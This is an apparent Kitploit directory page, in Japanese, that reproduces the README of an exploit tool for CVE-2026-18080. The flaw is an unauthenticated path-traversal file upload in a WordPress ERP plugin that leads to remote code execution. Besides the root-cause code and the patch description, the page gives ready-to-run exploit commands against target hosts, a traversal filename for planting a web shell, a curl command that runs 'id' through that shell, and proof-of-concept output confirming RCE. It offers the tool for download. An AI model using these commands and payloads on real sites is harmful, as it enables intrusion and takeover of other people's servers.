Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
By-Poloss..-..CVE-2026-18080 — CVE-2026-18080 のエクスプロイト。ERP Complete HR、Accounting & CRM Suite における、認証なしの任意ファイルアップロードによる RCE につながる脆弱性です。自動化されたエクスプロイト用の Python および PHP スクリプトが含まれています。 | Kitploit
ツール/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

CVE-2026-18080 のエクスプロイト。ERP Complete HR、Accounting & CRM Suite における、認証なしの任意ファイルアップロードによる RCE につながる脆弱性です。自動化されたエクスプロイト用の Python および PHP スクリプトが含まれています。

リポジトリを見る
19時間38分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

認証不要の任意ファイルアップロード(CRM Email Connect IMAP添付ファイル経由のパストラバーサル → RCE)

フィールド値
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
パッチhttps://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8(Critical)
CWECWE-434(危険なタイプのファイルの無制限アップロード)
影響を受けるバージョンERPプラグイン <= 1.17.7(1.17.8で修正済み)

説明

ERPプラグインのGmailSync.php内にあるsave_attachments()関数は、IMAPからの受信メール添付ファイルをパス正規化なしで処理します。攻撃者は../../plugins/shell.phpのようなファイル名と、プラグインの期待するパターンに一致する偽造されたReferencesヘッダーを含むメールを作成できます。cronベースのIMAP同期ジョブは、.htaccessで保護されたcrm-attachments/ディレクトリの外にあるwp-content/配下の任意の書き込み可能なパスにファイルを書き込みます。

根本原因

GmailSync.php(v1.17.7)内:

root@kitploit:~
$name = $item['name'];              // basename()やパス正規化なし
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

ファイル名../../plugins/shell.phpは$dir(wp-content/uploads/crm-attachments/)と連結され、wp-content/plugins/shell.phpに解決されます — PHP実行が許可されているディレクトリです。

修正版(v1.17.8)では、basename()によるディレクトリコンポーネントの除去、パス区切り文字の拒否、危険な拡張子のブロックを行うsanitize_attachment_filename()が追加されています。

悪用方法

方法1: 直接(wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

方法2: カスタムパスとシェル名

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

方法3: phpinfoプローブ

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

アップロード成功後:

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

概念実証

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

ファイル

ファイル説明
exploit.pywp-cliを使用するPythonエクスプロイトスクリプト
exploit.phpwp eval-file用のスタンドアロンPHPエクスプロイト
README.mdこのファイル
ツールをダウンロード